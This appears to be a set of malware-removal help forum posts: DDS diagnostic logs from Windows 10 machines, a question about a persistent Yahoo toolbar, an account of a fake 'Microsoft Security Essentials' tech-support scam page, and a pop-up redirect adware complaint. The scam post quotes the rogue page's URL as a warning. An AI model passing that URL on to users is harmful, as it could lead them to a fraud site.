S4 tzautoupdate;Auto Time Zone Updater;c:\windows\system32\svchost.exe -k LocalService [2015-10-30 37256]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=c:\windows\system32\NOTEPAD.EXE %1 [UserChoice]
ShellExec: SZBrowser.exe: open="c:\program files\avast software\szbrowser\Launcher.exe" "%1"
.
=============== Created Last 30 ================
.
2016-11-12 14:20:29 -------- d-----w- c:\program files\CCleaner
2016-11-11 11:55:48 -------- d-----w- C:\AdwCleaner
2016-11-09 15:06:58 -------- d-----w- c:\windows\system32\BestPractices
2016-11-09 09:27:59 712704 ----a-w- c:\windows\system32\RemoteNaturalLanguage.dll
2016-11-09 09:26:59 1536088 ----a-w- c:\windows\system32\crypt32.dll
2016-11-09 09:25:58 616960 ----a-w- c:\windows\system32\winhttp.dll
2016-10-30 22:50:50 96200 ----a-w- c:\program files\mozilla firefox\nssdbm3.dll
2016-10-22 11:48:52 210376 ----a-w- c:\program files\mozilla firefox\sandboxbroker.dll
2016-10-22 11:48:51 970912 ----a-w- c:\program files\mozilla firefox\msvcr120.dll
2016-10-22 11:48:51 455328 ----a-w- c:\program files\mozilla firefox\msvcp120.dll
.
==================== Find3M ====================
.
2016-11-12 13:57:51 170200 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-11-02 13:32:04 316256 ----a-w- c:\windows\system32\atmfd.dll
2016-11-02 13:31:34 546968 ----a-w- c:\windows\system32\fontdrvhost.exe
2016-11-02 12:51:49 37376 ----a-w- c:\windows\system32\atmlib.dll
2016-10-28 21:48:45 828408 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2016-10-28 21:48:45 176632 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2016-10-25 08:34:10 875992 ----a-w- c:\windows\system32\winresume.efi
2016-10-25 08:34:09 771120 ----a-w- c:\windows\system32\winresume.exe
2016-10-25 08:32:28 927072 ----a-w- c:\windows\system32\winload.exe
2016-10-25 08:32:26 1561392 ----a-w- c:\windows\system32\KernelBase.dll
2016-10-25 08:32:22 1051584 ----a-w- c:\windows\system32\winload.efi
2016-10-25 08:32:20 845568 ----a-w- c:\windows\system32\MrmCoreR.dll
2016-10-25 08:32:19 34088 ----a-w- c:\windows\system32\wldp.dll
2016-10-25 08:32:17 5793632 ----a-w- c:\windows\system32\ntoskrnl.exe
2016-10-25 08:32:09 101216 ----a-w- c:\windows\system32\drivers\mup.sys
2016-10-25 08:32:01 1862000 ----a-w- c:\windows\system32\CoreUIComponents.dll
2016-10-25 08:30:40 1541792 ----a-w- c:\windows\system32\ntdll.dll
2016-10-25 08:30:38 354144 ----a-w- c:\windows\system32\halmacpi.dll
2016-10-25 08:30:29 281440 ----a-w- c:\windows\system32\drivers\clfs.sys
2016-10-25 08:28:59 545432 ----a-w- c:\windows\system32\CoreMessaging.dll
2016-10-25 08:28:58 553808 ----a-w- c:\windows\system32\ci.dll
2016-10-25 08:28:56 1083648 ----a-w- c:\windows\system32\Taskmgr.exe
2016-10-25 08:15:54 433504 ----a-w- c:\windows\system32\pcasvc.dll
2016-10-25 08:15:32 1194328 ----a-w- c:\windows\system32\diagtrack.dll
2016-10-25 08:14:24 856928 ----a-w- c:\windows\system32\SecConfig.efi
2016-10-25 08:08:55 2885680 ----a-w- c:\windows\system32\WSService.dll
2016-10-25 07:39:36 306840 ----a-w- c:\windows\system32\wlanapi.dll
2016-10-25 07:37:48 980352 ----a-w- c:\windows\system32\mfasfsrcsnk.dll
2016-10-25 07:37:46 882720 ----a-w- c:\windows\system32\mfmp4srcsnk.dll
2016-10-25 07:37:42 895080 ----a-w- c:\windows\system32\mfsrcsnk.dll
2016-10-25 07:37:42 709176 ----a-w- c:\windows\system32\mfsvr.dll
2016-10-25 07:37:19 1349632 ----a-w- c:\windows\system32\winmde.dll
2016-10-25 07:37:17 1334680 ----a-w- c:\windows\system32\wmpmde.dll
2016-10-25 07:31:30 957608 ----a-w- c:\windows\system32\ole32.dll
2016-10-25 07:31:28 1824272 ----a-w- c:\windows\system32\combase.dll
2016-10-25 07:30:45 703840 ----a-w- c:\windows\system32\WWAHost.exe
2016-10-25 07:28:10 1300016 ----a-w- c:\windows\system32\WpcMon.exe
2016-10-25 07:27:39 613120 ----a-w- c:\windows\system32\Windows.Internal.Shell.Broker.dll
2016-10-25 07:27:31 305304 ----a-w- c:\windows\system32\SystemSettingsAdminFlows.exe
2016-10-25 07:27:27 465760 ----a-w- c:\windows\system32\SettingSyncHost.exe
2016-10-25 07:26:30 569752 ----a-w- c:\windows\system32\SHCore.dll
2016-10-25 07:26:27 836752 ----a-w- c:\windows\system32\twinapi.appcore.dll
2016-10-25 07:26:27 5240952 ----a-w- c:\windows\system32\windows.storage.dll
2016-10-25 07:26:26 4074160 ----a-w- c:\windows\explorer.exe
2016-10-25 07:26:19 1355344 ----a-w- c:\windows\system32\propsys.dll
2016-10-25 07:25:33 633192 ----a-w- c:\windows\system32\sppwinob.dll
2016-10-25 07:25:21 1337680 ----a-w- c:\windows\system32\sppobjs.dll
2016-10-25 07:24:26 5598832 ----a-w- c:\windows\system32\sppsvc.exe
2016-10-25 07:23:20 995288 ----a-w- c:\windows\system32\ClipUp.exe
2016-10-25 07:23:00 510872 ----a-w- c:\windows\system32\ClipSVC.dll
2016-10-25 07:22:22 505136 ----a-w- c:\windows\system32\drivers\cng.sys
2016-10-25 07:22:16 268040 ----a-w- c:\windows\system32\wintrust.dll
2016-10-25 07:19:07 295776 ----a-w- c:\windows\system32\msv1_0.dll
2016-10-25 06:58:23 536416 ----a-w- c:\windows\system32\drivers\vhdmp.sys
2016-10-25 06:56:06 2195640 ----a-w- c:\windows\system32\d3d10warp.dll
2016-10-25 06:55:58 1712992 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2016-10-25 06:55:51 484704 ----a-w- c:\windows\system32\drivers\dxgmms2.sys
2016-10-25 06:55:49 336736 ----a-w- c:\windows\system32\drivers\dxgmms1.sys
2016-10-25 06:54:31 273760 ----a-w- c:\windows\system32\input.dll
2016-10-25 06:54:29 1522160 ----a-w- c:\windows\system32\WindowsCodecs.dll
2016-10-25 06:53:59 1174008 ----a-w- c:\windows\system32\msctf.dll
2016-10-25 06:39:08 403920 ----a-w- c:\windows\system32\DMRServer.dll
2016-10-25 06:38:37 25952 ----a-w- c:\windows\system32\drivers\usbd.sys
2016-10-25 06:27:45 72192 ----a-w- c:\windows\system32\rdpudd.dll
2016-10-25 06:27:24 74752 ----a-w- c:\windows\system32\MapsCSP.dll
2016-10-25 06:26:27 88576 ----a-w- c:\windows\system32\olepro32.dll
2016-10-25 06:23:27 239616 ----a-w- c:\windows\system32\wcl.dll
2016-10-25 06:21:25 50176 ----a-w- c:\windows\system32\MosHostClient.dll
2016-10-25 06:19:36 17408 ----a-w- c:\windows\system32\drivers\genericusbfn.sys
2016-10-25 06:19:14 572928 ----a-w- c:\windows\system32\WpcWebFilter.dll
2016-10-25 06:18:18 299008 ----a-w- c:\windows\system32\microsoft-windows-system-events.dll
2016-10-25 06:18:08 25600 ----a-w- c:\windows\system32\odbcconf.dll
2016-10-25 06:13:50 37376 ----a-w- c:\windows\system32\musdialoghandlers.dll
2016-10-25 06:12:26 81408 ----a-w- c:\windows\system32\drivers\bowser.sys
2016-10-25 06:11:22 23552 ----a-w- c:\windows\system32\mapsupdatetask.dll
2016-10-25 06:10:05 33792 ----a-w- c:\windows\system32\drivers\BthAvrcpTg.sys
2016-10-25 06:09:36 584704 ----a-w- c:\windows\system32\UIRibbonRes.dll
2016-10-25 06:09:20 65536 ----a-w- c:\windows\system32\wininetlui.dll
2016-10-25 06:08:31 59904 ----a-w- c:\windows\system32\MosStorage.dll
2016-10-25 06:07:45 35328 ----a-w- c:\windows\system32\drivers\scfilter.sys
2016-10-25 06:06:55 87040 ----a-w- c:\windows\system32\MapsBtSvc.dll
2016-10-25 06:05:46 78848 ----a-w- c:\windows\system32\asycfilt.dll
2016-10-25 06:03:37 38912 ----a-w- c:\windows\system32\TpmTasks.dll
2016-10-25 06:03:14 69632 ----a-w- c:\windows\system32\SCardDlg.dll
2016-10-25 06:03:14 64512 ----a-w- c:\windows\system32\MshtmlDac.dll
2016-10-25 06:02:58 38400 ----a-w- c:\windows\system32\HttpsDataSource.dll
2016-10-25 06:02:33 54784 ----a-w- c:\windows\system32\moshost.dll
2016-10-25 06:02:26 68096 ----a-w- c:\windows\system32\drivers\hdaudbus.sys
2016-10-25 06:01:41 183296 ----a-w- c:\windows\system32\NPSMDesktopProvider.dll
2016-10-25 06:00:34 115200 ----a-w- c:\windows\system32\PortableDeviceClassExtension.dll
2016-10-25 06:00:23 256512 ----a-w- c:\windows\system32\unimdm.tsp
2016-10-25 06:00:22 177664 ----a-w- c:\windows\system32\hgprint.dll
2016-10-25 06:00:06 102912 ----a-w- c:\windows\system32\NPSM.dll
2016-10-25 05:59:41 205312 ----a-w- c:\windows\system32\oemlicense.dll
2016-10-25 05:58:47 165376 ----a-w- c:\windows\system32\drivers\ndiswan.sys
2016-10-25 05:57:04 267776 ----a-w- c:\windows\system32\usocore.dll
2016-10-25 05:56:53 59904 ----a-w- c:\windows\system32\PortableDeviceConnectApi.dll
2016-10-25 05:56:17 203776 ----a-w- c:\windows\system32\moshostcore.dll
2016-10-25 05:54:08 92160 ----a-w- c:\windows\system32\IdCtrls.dll
2016-10-25 05:54:08 2478592 ----a-w- c:\windows\apppatch\AcGenral.dll
.
============= FINISH: 15:38:55.96 ===============

Then the attach one:
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 10 Pro
Boot Device: \Device\HarddiskVolume1
Install Date: 22/05/2016 4:14:26 PM
System Uptime: 11/11/2016 10:59:33 PM (41 hours ago)
.
Motherboard: Hewlett-Packard | | 3031h
Processor: Intel(R) Core(TM)2 Duo CPU E8500 @ 3.16GHz | XU1 PROCESSOR | 3166/1333mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 465 GiB total, 432.13 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e96b-e325-11ce-bfc1-08002be10318}
Description: Standard PS/2 Keyboard
Device ID: ACPI\PNP0303\4&3084B1C&0
Manufacturer: (Standard keyboards)
Name: Standard PS/2 Keyboard
PNP Device ID: ACPI\PNP0303\4&3084B1C&0
Service: i8042prt
.
Class GUID:
Description: PCI Serial Port
Device ID: PCI\VEN_8086&DEV_2E17&SUBSYS_3034103C&REV_03\3&B1BFB68&0&1B
Manufacturer:
Name: PCI Serial Port
PNP Device ID: PCI\VEN_8086&DEV_2E17&SUBSYS_3034103C&REV_03\3&B1BFB68&0&1B
Service:
.
Class GUID: {4d36e96f-e325-11ce-bfc1-08002be10318}
Description: PS/2 Compatible Mouse
Device ID: ACPI\PNP0F13\4&3084B1C&0
Manufacturer: Microsoft
Name: PS/2 Compatible Mouse
PNP Device ID: ACPI\PNP0F13\4&3084B1C&0
Service: i8042prt
.
==== System Restore Points ===================
.
RP33: 27/10/2016 8:33:39 PM - ASU_MSI_TRAN
RP34: 6/11/2016 11:01:44 PM - Scheduled Checkpoint
RP35: 10/11/2016 11:03:13 PM - Windows Update
.
==== Installed Programs ======================
.
Adobe Flash Player 23 NPAPI
Amazon Kindle
Avast Premier
CCleaner
FamilySearch Indexing 3.27.7
HP Customer Experience Enhancements
HP DeskJet 3630 series Basic Device Software
HP DeskJet 3630 series Help
HP Dropbox Plugin
HP Google Drive Plugin
HP Photo Creations
HP Support Assistant
HP Support Solutions Framework
HP Update
IrfanView (remove only)
Legacy 8.0
Microsoft Office 365 - en-us
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Mozilla Firefox 49.0.2 (x86 en-US)
Mozilla Maintenance Service
Mozilla Thunderbird 45.4.0 (x86 en-US)
NETGEAR WNA3100 wireless USB 2.0 adapter
Office 16 Click-to-Run Extensibility Component
Office 16 Click-to-Run Licensing Component
Office 16 Click-to-Run Localization Component
SafeZone Stable 1.51.2220.62
Skype™ 7.29
Windows Live Toolbar
.
==== Event Viewer Messages From Past Week ========
.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The User Data Storage_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The User Data Access_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The Sync Host_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The Contact Data_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:20 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the User Data Storage_1434c2c8 service to connect.
9/11/2016 1:37:20 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the Sync Host_1434c2c8 service to connect.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The User Data Storage_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The User Data Access_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The Sync Host_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The Contact Data_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
.
==== End Of File ===========================

Remove unwanted Yahoo toolbar

I recently got this unwanted Yahoo toolbar in Chrome even though it has no extension and the default search is Google. I tried uninstalling YouTube Downloader, which I assume started it. I ran Windows Defender and Avast antivirus, ran the mrt command, and yet no malware is detected. I uninstalled and reinstalled Chrome. Yet it's still there. Please help me with this. It is right below the bookmarks and is very irritating. Searches in the Google search box are also redirected to this toolbar and start a Yahoo search.

Ransomware in Firefox

I think I just got hit with ransomware in my browser this morning.

I use Firefox on a five-month-old laptop running Windows 10. I clicked on a link in a Google search (and I honestly can't remember what it was now, but it was to do with Excel VBA coding) and I got a new tab in my browser which was headed 'Microsoft Security Essentials'. Almost immediately a computer voice started up telling me I had a virus and to phone the number on the screen to 'help' me remove it. The number was a toll-free 0800 number in the USA. I live in the UK. The sneaky thing is that they also placed a dialog box on the window asking for a username and password (for what purpose it did not say) with OK and Cancel buttons. Hitting Cancel (or the Escape key) just caused the dialog box to reappear. This obviously locked my entire Firefox session and other tabs were inaccessible. None of the normal Close Window options would work, so the session was stuck.

In the main page there was what looked to all the world (as I subsequently found) like a real Security Essentials screen, with all the right layout and colours etc. I had never actually heard of Security Essentials before, and I discovered through using another browser (Chrome, which was not affected) that it doesn't actually run under Windows 10. On looking further at the page it became apparent that the message, much the same as the voiceover, was written by someone whose first language was not English. The implication of the text was that any banking apps on my computer had been compromised.

I'm guessing that if I did call the number from across the Atlantic they would demand money and may or may not 'fix' my computer.

I closed Firefox with Task Manager, but on restarting it the rogue page obviously reappeared, as I have it set to re-open the tabs that were open when it was closed. I managed to get rid of it, though. From Chrome I started something that required a new tab to be opened in my default browser, which is Firefox. Since FF was closed at the time, it got fired up and opened the requested page. Fortunately FF went into its 'Well, this is embarrassing' routine and failed to open any of the old tabs, giving the list it thought it had before. I unticked the rogue page, clicked Go and everything opened as normal.

What this long-winded introduction is coming to is this: am I really infected with anything, and are my bank and card accounts really compromised? I have run full scans using IObit's Malware Fighter, AVG and Malwarebytes Anti-Malware and they did not report anything that looked remotely connected (basically just a few cookies and something to do with an Amazon button). I try to keep a clean machine and run Malware Fighter regularly. I downloaded Malwarebytes specially for this. I am up to date with Windows and other Microsoft updates (e.g. Office). Should I change all my financially-connected passwords? I haven't been into any of them since this episode yet.

I'm sorry, I should have thought to take a screen-grab of the dodgy page, as it might have been useful for others to see, but it didn't occur to me at the time in my panic to get rid of it. However, I took a note of the URL and it is (preceded by http://) z13xx03-virus.com/en/?id=MDgwMCAwODYgOTgyOA. I provide this just in case anyone recognises it - ON NO ACCOUNT OPEN IT!!

I hope someone can advise.

Bill

Pop-up ad problem: Firefox, Chrome and Edge probably

I have a problem with pop-up ads: when a pop-up sometimes occurs, it redirects to unwanted ads, not where it is supposed to pop up to. I know this came from a free download I did, and even though I realised fairly quickly what it was, it got on my system and infected it. It has installed something somewhere that causes redirection of pop-ups.

I have done all normal advertised steps and repeated:

AdwCleaner

Malwarebytes Anti-Malware Free

HitmanPro

Reset browsers to default and rebooted.

I think these programs and steps have done something, but something is still present, as sometimes when a pop-up occurs it redirects to unwanted ads. Making a new user would probably solve it, I think, but it would be good to solve it on this user. I know if the right file was deleted it would be gone, but I do not know where it is and I am running out of steps to follow.

Anyone have some experience with where it might be and how to remove it? Thank you in advance.

Here is what I was advised to provide to you:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0 BrowserJavaVersion: 11.111.2
Run by theun at 2:44:34 on 2016-11-27
Microsoft Windows 10 Pro 10.0.14393.0.1252.44.1033.18.3918.1000 [GMT 0:00]
.
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG AntiVirus Free Edition *Enabled/Updated* {4D41356F-32AD-7C42-C820-63775EE4F413}
SP: Spybot - Search and Destroy *Enabled/Updated* {A16C3F68-9280-E053-1818-342707FECF4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition *Enabled/Updated* {F620D48B-1497-73CC-F290-58052563BEAE}
FF - plugin: C:\Program Files (x86)\Nitro PDF\Professional 7\npdf.dll
FF - plugin: C:\Program Files (x86)\Nitro PDF\Professional 7\npnitroie.dll
FF - plugin: C:\Program Files (x86)\Nitro PDF\Professional 7\npnitromozilla.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll
FF - plugin: C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_207.dll
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHA;AVGIDSHA;C:\WINDOWS\System32\drivers\avgidsha.sys [2016-6-1 267008]
R0 Avgloga;AVG Logging Driver;C:\WINDOWS\System32\drivers\avgloga.sys [2016-2-16 360736]
R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\WINDOWS\System32\drivers\avgmfx64.sys [2016-9-26 254208]
R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\WINDOWS\System32\drivers\avgrkx64.sys [2016-6-1 52992]
R0 Avguniva;AVG Universal Driver;C:\WINDOWS\System32\drivers\avguniva.sys [2016-6-1 77056]
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2016-7-16 48152]
R0 iorate;iorate;C:\WINDOWS\System32\drivers\iorate.sys [2016-11-8 48992]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2016-10-28 227328]
R1 Avgdiska;AVG Disk Driver;C:\WINDOWS\System32\drivers\avgdiska.sys [2016-5-13 163072]
R1 AVGIDSDriver;AVGIDSDriver;C:\WINDOWS\System32\drivers\avgidsdrivera.sys [2016-10-17 312576]
R1 Avgldx64;AVG AVI Loader Driver;C:\WINDOWS\System32\drivers\avgldx64.sys [2016-10-19 267520]
R1 avgtp;avgtp;C:\WINDOWS\System32\drivers\avgtpx64.sys [2013-9-10 46368]
R1 Avgwfpa;AVG Firewall Driver;C:\WINDOWS\System32\drivers\avgwfpa.sys [2016-8-4 313096]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2016-7-16 88576]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2016-7-16 8192]
R2 clreg;Virtual Registry for Containers;C:\WINDOWS\System32\drivers\registry.sys [2016-7-16 70144]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-12-1 38896]
R3 MBAMProtector;MBAMProtector;C:\WINDOWS\System32\drivers\mbam.sys [2013-9-10 27008]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\WINDOWS\System32\drivers\mwac.sys [2015-2-23 65408]
S0 Avgboota;AVG Early Launch Anti-Malware Driver;C:\WINDOWS\System32\drivers\avgboota.sys [2016-1-7 21632]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2016-7-16 18432]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2016-7-16 1135456]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2016-7-16 15360]
S3 AppvStrm;AppvStrm;C:\WINDOWS\System32\drivers\AppVStrm.sys [2016-9-30 127328]
S3 AppvVemgr;AppvVemgr;C:\WINDOWS\System32\drivers\AppvVemgr.sys [2016-7-16 157024]
S3 AppvVfs;AppvVfs;C:\WINDOWS\System32\drivers\AppvVfs.sys [2016-7-16 141152]
S3 bcmfn;bcmfn Service;C:\WINDOWS\System32\drivers\bcmfn.sys [2016-7-16 9728]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2016-7-16 9728]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2016-7-16 38912]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2016-10-28 118272]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2016-7-16 346976]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2016-7-16 2104160]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2016-7-16 20480]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2016-7-16 50016]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;C:\WINDOWS\System32\drivers\hitmanpro37.sys [2016-11-25 54736]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2016-7-16 33280]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2016-7-16 81408]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2016-7-16 64512]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2016-7-16 176384]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2016-7-16 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2016-7-16 113152]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2016-7-16 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2016-7-16 526176]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2016-7-16 35840]
S3 intaud_WaveExtensible;Intel WiDi Audio Device;C:\WINDOWS\System32\drivers\intelaud.sys [2015-12-1 50160]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2016-7-16 105824]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2016-7-16 101216]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2016-10-11 64352]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2016-7-16 842584]
.
=============== Created Last 30 ================
.
2016-11-26 03:34:41 203680 ----a-w- C:\WINDOWS\System32\drivers\zam64.sys
2016-11-26 03:34:38 203680 ----a-w- C:\WINDOWS\System32\drivers\zamguard64.sys
2016-11-26 03:34:36 -------- d-----w- C:\Users\theun\AppData\Local\Zemana
2016-11-25 23:53:18 -------- d-----w- C:\Users\theun\AppData\Roaming\TeamViewer
2016-11-25 04:18:20 -------- d--h--w- C:\OneDriveTemp
2016-11-25 03:35:23 54736 ----a-w- C:\WINDOWS\System32\drivers\hitmanpro37.sys
2016-11-25 03:35:00 -------- d-----w- C:\ProgramData\HitmanPro
2016-11-25 03:31:04 -------- d-----w- C:\AdwCleaner
2016-11-25 01:28:25 -------- d-----w- C:\Users\theun\AppData\Local\Programs
2016-11-23 23:41:33 -------- d-----w- C:\Users\theun\AppData\Local\LogMeIn Rescue Applet
2016-11-18 14:31:22 41928 ----a-w- C:\Program Files (x86)\Mozilla Firefox\IA2Marshal.dll
2016-11-10 16:10:07 -------- d-----w- C:\Program Files\iPod
2016-11-10 16:09:42 -------- d---a-w- C:\Program Files\iTunes
2016-11-08 21:45:55 65536 ----a-w- C:\WINDOWS\SysWow64\wininetlui.dll
2016-11-08 21:44:59 3892352 ----a-w- C:\WINDOWS\SysWow64\mfcore.dll
2016-11-08 21:33:09 2104320 ----a-w- C:\WINDOWS\System32\wlidsvc.dll
2016-11-08 21:31:59 659968 ----a-w- C:\Program Files\Windows NT\TableTextService\TableTextService.dll
2016-11-08 21:30:57 4130432 ----a-w- C:\WINDOWS\System32\mfcore.dll
2016-11-08 21:28:55 942080 ----a-w- C:\WINDOWS\System32\audiosrv.dll
2016-11-08 21:27:57 714592 ----a-w- C:\WINDOWS\System32\drivers\vhdmp.sys
2016-10-30 07:28:00 29432 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll
2016-10-30 07:25:36 380192 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
2016-10-30 07:18:24 209104 ----a-w- C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
2016-10-28 14:17:08 498952 ----a-w- C:\WINDOWS\System32\DolbyDecMFT.dll
2016-10-28 14:17:08 1557808 ----a-w- C:\WINDOWS\SysWow64\winmde.dll
2016-10-28 14:17:08 1472536 ----a-w- C:\WINDOWS\System32\mfplat.dll
2016-10-28 14:17:07 1990648 ----a-w- C:\WINDOWS\System32\mfmp4srcsnk.dll
2016-10-28 14:17:05 6285312 ----a-w- C:\WINDOWS\System32\Windows.Media.dll
2016-10-28 14:17:04 244816 ----a-w- C:\WINDOWS\System32\mfps.dll
2016-10-28 14:17:03 147456 ----a-w- C:\WINDOWS\System32\winsrv.dll
2016-10-28 14:15:58 619368 ----a-w- C:\WINDOWS\System32\drivers\cng.sys
.
==================== Find3M ====================
.
2016-11-27 00:55:52 192216 ----a-w- C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys
2016-11-02 12:01:41 315744 ----a-w- C:\WINDOWS\SysWow64\atmfd.dll
2016-11-02 12:01:37 484584 ----a-w- C:\WINDOWS\SysWow64\AudioSes.dll
2016-11-02 11:22:59 601712 ----a-w- C:\WINDOWS\SysWow64\oleaut32.dll
2016-11-02 11:22:59 1570672 ----a-w- C:\WINDOWS\SysWow64\ntdll.dll
2016-11-02 11:20:37 590960 ----a-w- C:\WINDOWS\System32\AudioSes.dll
2016-11-02 11:20:36 378720 ----a-w- C:\WINDOWS\System32\atmfd.dll
2016-11-02 11:15:35 1051112 ----a-w- C:\WINDOWS\System32\winresume.efi
2016-11-02 11:15:33 894096 ----a-w- C:\WINDOWS\System32\winresume.exe
2016-11-02 11:14:00 7816544 ----a-w- C:\WINDOWS\System32\ntoskrnl.exe
2016-11-02 11:13:51 1354320 ----a-w- C:\WINDOWS\System32\winload.efi
2016-11-02 11:13:51 1173496 ----a-w- C:\WINDOWS\System32\winload.exe
2016-11-02 11:13:47 1883784 ----a-w- C:\WINDOWS\System32\ntdll.dll
2016-11-02 11:13:43 773720 ----a-w- C:\WINDOWS\System32\oleaut32.dll
2016-11-02 11:13:36 423776 ----a-w- C:\WINDOWS\System32\wifitask.exe
2016-11-02 11:12:57 341344 ----a-w- C:\WINDOWS\SysWow64\msv1_0.dll
2016-11-02 11:12:35 2255712 ----a-w- C:\WINDOWS\System32\drivers\ntfs.sys
2016-11-02 11:12:07 376672 ----a-w- C:\WINDOWS\System32\drivers\clfs.sys
2016-11-02 11:10:44 2323728 ----a-w- C:\WINDOWS\SysWow64\d3d10warp.dll
2016-11-02 11:08:52 576408 ----a-w- C:\WINDOWS\SysWow64\wer.dll
2016-11-02 11:08:43 186424 ----a-w- C:\WINDOWS\SysWow64\weretw.dll
